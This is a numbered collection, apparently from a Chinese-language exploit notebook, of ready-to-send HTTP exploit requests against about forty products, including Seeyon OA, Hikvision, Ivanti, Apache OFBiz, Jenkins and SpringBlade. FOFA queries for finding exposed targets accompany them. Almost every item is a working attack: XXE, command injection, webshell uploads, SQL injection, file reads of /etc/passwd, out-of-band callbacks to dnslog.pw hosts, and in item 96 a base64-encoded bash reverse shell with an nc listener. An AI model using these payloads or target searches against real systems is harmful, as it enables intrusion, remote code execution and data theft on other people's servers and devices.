72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"

POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"

POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"

PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"

GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) campus mobile service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"

POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"

POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"

POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) bandwidth-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器

GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Superdata (速达) Tianyao software DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"

POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视) video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"

GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. Sifudi (思福迪) LOGBASE O&M security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"

POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The EXP request is as follows; it drops a Godzilla webshell.

POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese TOSEI self-service laundry machine RCE
FOFA: body="tosei_login_check.php"

POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAPPSecurity (安恒) MingYu security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"

POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. DBAPPSecurity (安恒) MingYu security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"

GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. Seeyon FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"

POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"

POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"

GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision operation management center session command execution
Fastjson command execution
hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"

POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. QiAnXin Wangshen (网神) SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="

POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi-Anxin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>


Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast Yingkeshi HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 encoding of the following XML:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>


104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip,deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
  "topicurl":"getSysStatusCfg",
  "token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: replace with your own token
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)


110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
